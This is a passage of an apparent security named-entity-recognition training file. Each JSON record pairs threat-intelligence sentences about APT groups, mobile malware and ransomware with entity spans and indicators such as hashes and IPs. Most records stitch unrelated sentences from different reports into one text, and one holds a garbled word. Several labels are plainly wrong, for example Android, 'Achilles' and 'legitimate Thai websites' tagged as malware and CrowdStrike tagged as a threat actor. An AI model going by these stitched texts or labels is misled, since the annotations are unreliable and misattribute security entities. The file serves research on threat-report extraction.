The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke .", "spans": {"MALWARE: HenBox": [[35, 41]], "SYSTEM: Windows": [[143, 150]], "MALWARE: PlugX": [[185, 190]], "MALWARE: Zupdax": [[193, 199]], "MALWARE: 9002": [[202, 206]], "MALWARE: Poison Ivy": [[213, 223]], "THREAT_ACTOR: APT41": [[238, 243]], "THREAT_ACTOR: Dukes": [[515, 520]], "MALWARE: MiniDuke": [[611, 619]], "MALWARE: CozyDuke": [[624, 632]]}, "info": {"id": "cyberner_stix_train_007637", "source": "cyberner_stix_train"}} {"text": "The most common registrar used by the adversary is HiChina Zhicheng Technology Ltd .", "spans": {"ORGANIZATION: HiChina Zhicheng Technology Ltd": [[51, 82]]}, "info": {"id": "cyberner_stix_train_007638", "source": "cyberner_stix_train"}} {"text": "Table 1 highlights some recent examples of this activity .", "spans": {}, "info": {"id": "cyberner_stix_train_007639", "source": "cyberner_stix_train"}} {"text": "In the case of TA505 , while most elements of the framework are well-developed , their reliance on the Necurs botnet for the sending high-volume malicious spam - a key component of the Vector element above - appears to be their Achilles heel .", "spans": {"THREAT_ACTOR: TA505": [[15, 20]], "MALWARE: Necurs": [[103, 109]], "MALWARE: Achilles": [[228, 236]]}, "info": {"id": "cyberner_stix_train_007640", "source": "cyberner_stix_train"}} {"text": "Consequently , the data and lastsize fields are mangled .", "spans": {}, "info": {"id": "cyberner_stix_train_007641", "source": "cyberner_stix_train"}} {"text": "Conclusion Typically masquerading as legitimate Android system apps , and sometimes embedding legitimate apps within them , the primary goal of the malicious HenBox appears to be to spy on those who install them . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer . 
From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings .", "spans": {"MALWARE: Android": [[48, 55]], "MALWARE: HenBox": [[158, 164]], "THREAT_ACTOR: attacker": [[248, 256]], "TOOL: BalkanRAT": [[314, 323]], "THREAT_ACTOR: APT33": [[410, 415]], "ORGANIZATION: organization": [[435, 447]], "ORGANIZATION: aerospace sector": [[455, 471]], "ORGANIZATION: business conglomerate": [[487, 508]]}, "info": {"id": "cyberner_stix_train_007642", "source": "cyberner_stix_train"}} {"text": "The jpg pulled from treestower.com displays a graphic picture of a dead man , which also appeared on a Palestinian news website discussing the death of Hamas military leader Mazen Fuqaha .", "spans": {"DOMAIN: treestower.com": [[20, 34]], "ORGANIZATION: Hamas": [[152, 157]]}, "info": {"id": "cyberner_stix_train_007643", "source": "cyberner_stix_train"}} {"text": "This could essentially allow for external devices to act as a trigger to execute the malicious HenBox code , or perhaps afford additional data HenBox can collect and exfiltrate . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . 
The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"MALWARE: HenBox": [[95, 101], [143, 149]], "THREAT_ACTOR: APT41": [[245, 250]], "TOOL: variety of TTPs": [[263, 278]], "TOOL: Flash": [[427, 432]], "VULNERABILITY: exploits": [[433, 441]], "MALWARE: Carberp": [[459, 466]], "MALWARE: JHUHUGIT downloaders": [[473, 493]]}, "info": {"id": "cyberner_stix_train_007644", "source": "cyberner_stix_train"}} {"text": "Symantec detects this threat as Backdoor.Nidiran .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: Backdoor.Nidiran": [[32, 48]]}, "info": {"id": "cyberner_stix_train_007645", "source": "cyberner_stix_train"}} {"text": "It allows threat actors to execute additional tools and perform post-intrusion actions on compromised systems .", "spans": {}, "info": {"id": "cyberner_stix_train_007646", "source": "cyberner_stix_train"}} {"text": "All three files are required for the malware to run correctly .", "spans": {}, "info": {"id": "cyberner_stix_train_007647", "source": "cyberner_stix_train"}} {"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . 
The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past .", "spans": {"ORGANIZATION: healthcare": [[92, 102], [318, 328]], "ORGANIZATION: healthcare firms": [[189, 205]], "ORGANIZATION: IT organizations": [[208, 224]], "ORGANIZATION: medical clinics": [[258, 273]], "ORGANIZATION: logistical organizations": [[280, 304]], "MALWARE: legitimate Thai websites": [[370, 394]]}, "info": {"id": "cyberner_stix_train_007648", "source": "cyberner_stix_train"}} {"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar .", "spans": {"ORGANIZATION: audiences": [[247, 256]], "MALWARE: DanderSpritz": [[259, 271]], "MALWARE: FuZZbuNch": [[340, 349]], "MALWARE: DisableSecurity": [[455, 470]], "MALWARE: EnableSecurity": [[475, 489]], "MALWARE: DarkPulsar": [[494, 504]]}, "info": {"id": "cyberner_stix_train_007649", "source": "cyberner_stix_train"}} {"text": "We used a sample app named “ org.starsizew ” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS ’ s code . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office . After that , the malware checks if the existence of the files “ ExcelMyMacros.txt ” and “ wordMacros.txt ” in the same path where it is executed : if true then it reads their contents otherwise it will exit . 
None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"MALWARE: RuMMS": [[104, 109]], "TOOL: VPN Web Portal": [[158, 172]], "ORGANIZATION: IT vendors": [[208, 218]], "ORGANIZATION: financial institutes": [[229, 249]], "ORGANIZATION: Israeli Post Office": [[260, 279]], "FILEPATH: ExcelMyMacros.txt": [[345, 362]], "FILEPATH: wordMacros.txt": [[371, 385]], "THREAT_ACTOR: CrowdStrike Services": [[528, 548]], "TOOL: Microsoft Exchange": [[654, 672]]}, "info": {"id": "cyberner_stix_train_007650", "source": "cyberner_stix_train"}} {"text": "During our analysis , we observed this DDE downloading and executing a Zebrocy AutoIt downloader f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 , configured to attempt to download an additional payload from 220.158.216.127 .", "spans": {"MALWARE: Zebrocy": [[71, 78]], "TOOL: AutoIt": [[79, 85]], "FILEPATH: f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1": [[97, 161]], "IP_ADDRESS: 220.158.216.127": [[225, 240]]}, "info": {"id": "cyberner_stix_train_007651", "source": "cyberner_stix_train"}} {"text": "However , many users are in no hurry to update the operating systems of their products . Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . To avoid suspicion , this service name , as well as the executable name , were chosen to look similar to the name of a Microsoft .NET optimiza S-IDTYtion Service . 
Nevertheless , previous analyses by CERT - UA and FortiGuard Labs indicate that final payloads , which included AgentTesla and Cobalt Strike , were used for information theft and remote access to infected systems .", "spans": {"TOOL: Microsoft .NET optimiza S-IDTYtion Service": [[425, 467]], "ORGANIZATION: CERT - UA": [[506, 515]], "ORGANIZATION: FortiGuard Labs": [[520, 535]], "MALWARE: AgentTesla": [[582, 592]], "MALWARE: Cobalt Strike": [[597, 610]]}, "info": {"id": "cyberner_stix_train_007652", "source": "cyberner_stix_train"}} {"text": "Tap Menu > Play Protect . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December . The sole indicator on the source host that at.exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf ) that was created when the tool was executed . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": {"ORGANIZATION: Palo Alto Networks AutoFocus": [[55, 83]], "FILEPATH: at.exe": [[367, 373]], "FILEPATH: C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf": [[422, 460]], "VULNERABILITY: vulnerability": [[572, 585]]}, "info": {"id": "cyberner_stix_train_007654", "source": "cyberner_stix_train"}} {"text": "on 167.99.176.61 : free-androidvpn.date free-androidvpn.download free-androidvpn.online free-vpn.date free-vpn.download free-vpn.online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372 TEMP.Hermit is generally linked to operations focused on South Korea and the United States . 
, n.bat n.bat Unknown Likely runs native scilc.exe utility s1.txt", "spans": {"THREAT_ACTOR: TEMP.Hermit": [[272, 283]]}, "info": {"id": "cyberner_stix_train_007655", "source": "cyberner_stix_train"}} {"text": "Decrypted EventBot configuration Decrypted EventBot configuration returned from the C2 . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 . The loader 's main goal was to run a PowerShell command to execute shellcode .", "spans": {"MALWARE: EventBot": [[10, 18], [43, 51]], "MALWARE: Filensfer": [[89, 98]], "MALWARE: PowerShell command": [[220, 238]]}, "info": {"id": "cyberner_stix_train_007656", "source": "cyberner_stix_train"}} {"text": "The implant shared certain similarities with the old Miniduke implants .", "spans": {"THREAT_ACTOR: Miniduke": [[53, 61]]}, "info": {"id": "cyberner_stix_train_007657", "source": "cyberner_stix_train"}} {"text": "Ginning the ratings FURTHER READING 1 million Google accounts compromised by Android malware called Gooligan To implement the VM feature , the malicious APK installation dropper used by HummingWhale uses DroidPlugin , an extension originally developed by developers from China-based company Qihoo 360 , Check Point said . This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using . Remcos ( Backdoor.Remvio ) : A commodity remote administration tool ( RAT ) that can be used to steal information from an infected computer . 
If implemented correctly , PIEHOP can connect to a user supplied remote MSSQL server for uploading LIGHTWORK and issuing remote commands specifically targeting RTU , and then delete itself .", "spans": {"ORGANIZATION: Google": [[46, 52]], "SYSTEM: Android": [[77, 84]], "MALWARE: Gooligan": [[100, 108]], "MALWARE: HummingWhale": [[186, 198]], "MALWARE: DroidPlugin": [[204, 215]], "ORGANIZATION: Qihoo 360": [[291, 300]], "ORGANIZATION: Check Point": [[303, 314]], "TOOL: installers": [[359, 369]], "TOOL: uninstallers": [[372, 384]], "ORGANIZATION: Novetta": [[397, 404]], "THREAT_ACTOR: Lazarus Group": [[422, 435]], "MALWARE: Remcos": [[444, 450]], "MALWARE: Backdoor.Remvio": [[453, 468]], "TOOL: PIEHOP": [[613, 619]]}, "info": {"id": "cyberner_stix_train_007658", "source": "cyberner_stix_train"}} {"text": "Digital Attack on German Parliament: Investigative Report on the Hack of the Left Party Infrastructure in Bundestag .", "spans": {"ORGANIZATION: Bundestag": [[106, 115]]}, "info": {"id": "cyberner_stix_train_007659", "source": "cyberner_stix_train"}} {"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": {"MALWARE: JHUHUGIT": [[4, 12]], "THREAT_ACTOR: Sofacy": [[69, 75]], "TOOL: Java": [[110, 114]], "VULNERABILITY: zero-day": [[115, 123]], "VULNERABILITY: CVE-2015-2590": [[126, 139]]}, "info": {"id": "cyberner_stix_train_007660", "source": "cyberner_stix_train"}} {"text": "Technical analysis Obfuscation On top of recreating ransomware behavior in ways we haven ’ t seen before , the Android malware variant uses a new obfuscation technique unique to the Android platform . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 . Here we will examine an example of an oddly formatted ZIP archive hiding the NanoCore . 
The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": {"SYSTEM: Android": [[111, 118], [182, 189]], "THREAT_ACTOR: Ke3chang": [[205, 213]], "THREAT_ACTOR: attackers": [[214, 223]], "TOOL: MyWeb malware": [[239, 252]], "MALWARE: NanoCore": [[357, 365]], "THREAT_ACTOR: The group 's 91 attacks": [[368, 391]], "MALWARE: nasty zero - day": [[504, 520]]}, "info": {"id": "cyberner_stix_train_007661", "source": "cyberner_stix_train"}} {"text": "Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication .", "spans": {"THREAT_ACTOR: Bahamut": [[11, 18]], "THREAT_ACTOR: TG-3390": [[135, 142]]}, "info": {"id": "cyberner_stix_train_007662", "source": "cyberner_stix_train"}} {"text": "Malware code showing initializing broadcast receiver Figure 15 . cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . At figure 2, the second EOCD indicates that its only central directory is located at file offset 0xd148f whereas it is at 0xd40d41. 
(The size of the first But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": {"THREAT_ACTOR: cyber actors": [[65, 77]], "ORGANIZATION: media": [[112, 117]], "ORGANIZATION: aerospace": [[120, 129]], "ORGANIZATION: financial": [[132, 141]], "ORGANIZATION: critical infrastructure sectors": [[148, 179]], "VULNERABILITY: CVE-2023 - 34362": [[445, 461]], "THREAT_ACTOR: Cl0p": [[519, 523]]}, "info": {"id": "cyberner_stix_train_007663", "source": "cyberner_stix_train"}} {"text": "We will provide an analysis of the HyperBro tool in an upcoming section . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": {"ORGANIZATION: We": [[0, 2]], "MALWARE: HyperBro": [[35, 43]], "ORGANIZATION: CTU": [[171, 174]], "FILEPATH: cmd.exe": [[196, 203]]}, "info": {"id": "cyberner_stix_train_007664", "source": "cyberner_stix_train"}} {"text": "The code never informed phone users that it was collecting that data , a behavior uniformly viewed by many as a serious security concern . APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script . 
Daserf : 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd .", "spans": {"THREAT_ACTOR: APT10": [[139, 144]], "MALWARE: Daserf": [[344, 350]], "FILEPATH: 21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd": [[353, 417]]}, "info": {"id": "cyberner_stix_train_007665", "source": "cyberner_stix_train"}} {"text": "It was a secondary payload downloaded by Rockloader , the initial payload in a large email campaign using zipped JavaScript attachments .", "spans": {"MALWARE: Rockloader": [[41, 51]], "TOOL: email": [[85, 90]], "TOOL: zipped": [[106, 112]], "TOOL: JavaScript": [[113, 123]]}, "info": {"id": "cyberner_stix_train_007666", "source": "cyberner_stix_train"}} {"text": "C:\\Users\\user\\AppData\\Roaming\\Blaster.exe :", "spans": {"FILEPATH: C:\\Users\\user\\AppData\\Roaming\\Blaster.exe": [[0, 41]]}, "info": {"id": "cyberner_stix_train_007667", "source": "cyberner_stix_train"}} {"text": "The analyzed implant has a complex structure , and for now we have observed two modules . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack . Activity continued throughout April where additional versions of DarkComet , POSHC2 implants , and an AutoIt backdoor were deployed along with further credential dumping activities . 
Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": {"THREAT_ACTOR: attackers": [[94, 103]], "TOOL: SSL certificates": [[194, 210]], "TOOL: FakeTLS": [[219, 226]], "TOOL: Destover backdoor": [[252, 269]], "TOOL: Escad": [[287, 292]], "MALWARE: DarkComet": [[405, 414]], "MALWARE: POSHC2": [[417, 423]], "MALWARE: AutoIt backdoor": [[442, 457]], "SYSTEM: Cisco Secure Endpoint ( formerly AMP for Endpoints": [[523, 573]]}, "info": {"id": "cyberner_stix_train_007668", "source": "cyberner_stix_train"}} {"text": "Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": {"VULNERABILITY: zero day": [[82, 90]], "VULNERABILITY: CVE-2016-4171": [[91, 104]], "ORGANIZATION: Deepen": [[120, 126]], "THREAT_ACTOR: APT6": [[129, 133]], "MALWARE: PDF": [[189, 192]], "MALWARE: ZIP": [[197, 200]], "FILEPATH: SCR file": [[277, 285]]}, "info": {"id": "cyberner_stix_train_007669", "source": "cyberner_stix_train"}} {"text": "Upon further analysis it became clear this application was as malicious as they come and initially resembled the CopyCat malware , discovered by Check Point Research back in April 2016 . Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand . In addition , Saudi Arabia is a known customer of spyware and has used the technology domestically , according to Citizen Lab , a cybersecurity and human-rights focused research laboratory . 
Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment .", "spans": {"MALWARE: CopyCat": [[113, 120]], "ORGANIZATION: Check Point": [[145, 156]], "TOOL: Bookworm C2 servers": [[243, 262]], "MALWARE: spyware": [[410, 417]], "ORGANIZATION: Citizen Lab": [[474, 485]]}, "info": {"id": "cyberner_stix_train_007670", "source": "cyberner_stix_train"}} {"text": "With these details , we will then draw some conclusions about the operators of CARBANAK . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"THREAT_ACTOR: CARBANAK": [[79, 87]], "ORGANIZATION: CapabilitiesFormBook": [[90, 110]], "ORGANIZATION: banker": [[154, 160]]}, "info": {"id": "cyberner_stix_train_007671", "source": "cyberner_stix_train"}} {"text": "Aside from a change in its deployment techniques , a few changes in its code set it apart from its previous versions . Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement . SHA256: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43 . 
The IP range for “ PIG GOD ” is 43[.]255[.]188.0/22 , which appears to be hosted in Hong Kong as seen in the information we found : The domain 66[.]to leads to another website that shows Hack520 ’s pet pig .", "spans": {"THREAT_ACTOR: threat groups": [[188, 201]], "ORGANIZATION: media organizations": [[222, 241]], "FILEPATH: 5ac61ea5142d53412a251eb77f2961e3334a00c83da9087d355a49618220ac43": [[326, 390]]}, "info": {"id": "cyberner_stix_train_007672", "source": "cyberner_stix_train"}} {"text": "The attackers invested significant effort in attempting to hide the tool by changing the source code of the RAT and the RAT server , and by using an obfuscator and packer .", "spans": {"TOOL: RAT": [[108, 111], [120, 123]]}, "info": {"id": "cyberner_stix_train_007673", "source": "cyberner_stix_train"}} {"text": "We identified a notable lack of sophistication in this investigation such as copy/paste , unstable code , dead code and panels that are freely open . During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The attackers ’ deliberate use of compromised machines and dynamic Domain Name System ( DNS ) services allows them to hide traces of their presence by confusing their activities with data belonging to legitimate individuals . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": {"THREAT_ACTOR: threat actors": [[525, 538]], "TOOL: NetSupport RAT": [[556, 570]]}, "info": {"id": "cyberner_stix_train_007674", "source": "cyberner_stix_train"}} {"text": "Due to this Cerberus will come in handy for actors that want to focus on performing fraud without having to develop and maintain a botnet and C2 infrastructure . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . 
APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats .", "spans": {"MALWARE: Cerberus": [[12, 20]], "ORGANIZATION: organizations": [[301, 314]], "THREAT_ACTOR: APT39": [[358, 363]], "THREAT_ACTOR: groups": [[454, 460]], "ORGANIZATION: FireEye": [[461, 468]]}, "info": {"id": "cyberner_stix_train_007675", "source": "cyberner_stix_train"}} {"text": "Initiating the MQTT client . We assess APT33 works at the behest of the Iranian government . The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when . One of the problems with relying entirely on one security solution is that the cyber threat landscape changes rapidly .", "spans": {"THREAT_ACTOR: APT33": [[39, 44]]}, "info": {"id": "cyberner_stix_train_007676", "source": "cyberner_stix_train"}} {"text": "The threat actors have evolved to whitelisting IP addresses and only delivering the exploit and payload to specific targets of interest .", "spans": {}, "info": {"id": "cyberner_stix_train_007677", "source": "cyberner_stix_train"}} {"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . DoNot Team’s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February . 
Surprisingly , the source code is composed by more than 1600 lines of code and it is highly obfuscated .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: DoNot": [[53, 58]]}, "info": {"id": "cyberner_stix_train_007678", "source": "cyberner_stix_train"}} {"text": "According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate ’s network as early as February 2016 .", "spans": {"MALWARE: Winnti": [[55, 61]]}, "info": {"id": "cyberner_stix_train_007679", "source": "cyberner_stix_train"}} {"text": "It is the only activity group intentionally compromising and disrupting industrial safety instrumented systems , which can lead to scenarios involving loss of life and environmental damage .", "spans": {}, "info": {"id": "cyberner_stix_train_007680", "source": "cyberner_stix_train"}} {"text": "The Trojan sends these digits to the C & C , which in turn sends a command to display a fake data entry window to check the four digits . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors .", "spans": {"MALWARE: date string hardcoded": [[164, 185]], "TOOL: Bookworm sample": [[196, 211]], "THREAT_ACTOR: actor": [[265, 270]], "TOOL: emails": [[299, 305]], "ORGANIZATION: defense contractors": [[365, 384]]}, "info": {"id": "cyberner_stix_train_007681", "source": "cyberner_stix_train"}} {"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . 
One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: CVE-2017-10271": [[79, 93]], "MALWARE: Yahoyah": [[215, 222]], "MALWARE: malware": [[223, 230]]}, "info": {"id": "cyberner_stix_train_007682", "source": "cyberner_stix_train"}} {"text": "Of these modifications , arguably the most important were the ones done to the loader .", "spans": {}, "info": {"id": "cyberner_stix_train_007683", "source": "cyberner_stix_train"}} {"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations .", "spans": {"VULNERABILITY: Carbanak": [[11, 19]], "ORGANIZATION: banks": [[79, 84]], "ORGANIZATION: payment systems": [[91, 106]]}, "info": {"id": "cyberner_stix_train_007684", "source": "cyberner_stix_train"}} {"text": "Depending on the Trojan version , dynamically generated subdomains can also be used . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group .", "spans": {"ORGANIZATION: Trend Micro": [[100, 111]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[145, 164]], "ORGANIZATION: Microsoft": [[216, 225]], "ORGANIZATION: Facebook": [[250, 258]], "THREAT_ACTOR: Lazarus Group": [[349, 362]]}, "info": {"id": "cyberner_stix_train_007685", "source": "cyberner_stix_train"}} {"text": "On opening the app , two pop-up messages appear on screen : Change SMS App : This sets permissions to intercept every SMS received on the device and send a copy of these messages to the C2 server . 
If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"THREAT_ACTOR: hackers": [[248, 255]], "TOOL: emails": [[447, 453]], "FILEPATH: Microsoft Word documents": [[459, 483]], "VULNERABILITY: CVE-2017-0199": [[495, 508]]}, "info": {"id": "cyberner_stix_train_007686", "source": "cyberner_stix_train"}} {"text": "Some applications rely on SMS when it comes to in-app purchases — the transaction data is transferred via a short text message . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity .", "spans": {"ORGANIZATION: Kaspersky": [[129, 138]], "THREAT_ACTOR: ScarCruft": [[155, 164]], "VULNERABILITY: zero-day": [[194, 202]], "VULNERABILITY: CVE-2016-0147": [[205, 218]]}, "info": {"id": "cyberner_stix_train_007687", "source": "cyberner_stix_train"}} {"text": "Contacting the C2 server for instructions . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group — which goes by other names , including FinFisher and Lench IT Solutions . 
The body of the macro can be logically divided into two distinct parts : The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"TOOL: FinSpy": [[44, 50]], "THREAT_ACTOR: attacker": [[94, 102]], "THREAT_ACTOR: Gamma Group": [[209, 220]], "ORGANIZATION: FinFisher": [[261, 270]], "TOOL: macro": [[312, 317]], "THREAT_ACTOR: Monti ransomware collective": [[373, 400]], "ORGANIZATION: legal and governmental fields": [[466, 495]]}, "info": {"id": "cyberner_stix_train_007688", "source": "cyberner_stix_train"}} {"text": "For instance , the Trojan could automatically reply to an SMS and immediately delete it . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . simultaneous use of the detected Win32/KillDisk.NBO variants .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[94, 125]], "MALWARE: data-gathering implant": [[163, 185]], "MALWARE: Win32/KillDisk.NBO": [[256, 274]]}, "info": {"id": "cyberner_stix_train_007689", "source": "cyberner_stix_train"}} {"text": "The notification was intended to be used for system alerts or errors , but Android threats misused it to force the attacker-controlled UI to fully occupy the screen , blocking access to the device . Ultimately , this lead us to the conclusion that several of Gorgon Group 's members have a nexus in Pakistan . 
using the following IDAPython command in Output window : The attackers then ran reconnaissance commands such as whoami , netstat , quser , and net share , and tried to enumerate other servers for lateral movement with the quser and net view commands .", "spans": {"SYSTEM: Android": [[75, 82]], "THREAT_ACTOR: Gorgon Group": [[259, 271]], "TOOL: IDAPython": [[330, 339]], "THREAT_ACTOR: attackers": [[371, 380]], "TOOL: whoami": [[422, 428]], "TOOL: netstat": [[431, 438]], "TOOL: quser": [[441, 446], [532, 537]], "TOOL: net share": [[453, 462]], "TOOL: net view": [[542, 550]]}, "info": {"id": "cyberner_stix_train_007690", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 208.115.242.36 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 208.115.242.36": [[10, 24]]}, "info": {"id": "cyberner_stix_train_007691", "source": "cyberner_stix_train"}} {"text": "This trick – posing as a part of a legitimate Google service – may help avoid scrutiny . APT32 actors continue to deliver the malicious attachments via spear-phishing emails . The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors .", "spans": {"ORGANIZATION: Google": [[46, 52]], "THREAT_ACTOR: APT32": [[89, 94]], "MALWARE: malicious attachments": [[126, 147]], "ORGANIZATION: Network Security": [[180, 196]], "TOOL: IPS": [[211, 214]], "TOOL: NGFW": [[219, 223]]}, "info": {"id": "cyberner_stix_train_007692", "source": "cyberner_stix_train"}} {"text": "It turns out , that Trojans behave quite the same way . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . 
Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": {"TOOL: Lamberts toolkit": [[125, 141]], "TOOL: Black Lambert": [[158, 171]], "VULNERABILITY: zero day exploit": [[208, 224]], "VULNERABILITY: CVE-2014-4148": [[227, 240]], "THREAT_ACTOR: OilRig": [[308, 314]], "FILEPATH: Clayslide delivery documents": [[322, 350]]}, "info": {"id": "cyberner_stix_train_007693", "source": "cyberner_stix_train"}} {"text": "Trojan.Sofacy ( also known as Seduploader ) performs basic reconnaissance on an infected computer and can download further malware .", "spans": {"FILEPATH: Trojan.Sofacy": [[0, 13]], "MALWARE: Seduploader": [[30, 41]]}, "info": {"id": "cyberner_stix_train_007694", "source": "cyberner_stix_train"}} {"text": "When executed , the Poison Ivy threat , or Backdoor.Odivy , connects to a command and control ( C&C ) server over TCP port 80 .", "spans": {"MALWARE: Poison Ivy": [[20, 30]], "FILEPATH: Backdoor.Odivy": [[43, 57]], "TOOL: command and control": [[74, 93]], "TOOL: C&C": [[96, 99]]}, "info": {"id": "cyberner_stix_train_007695", "source": "cyberner_stix_train"}} {"text": "This is why we recently released Cybereason Mobile , a new offering that strengthens the Cybereason Defense Platform by bringing prevention , detection , and response capabilities to mobile devices . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
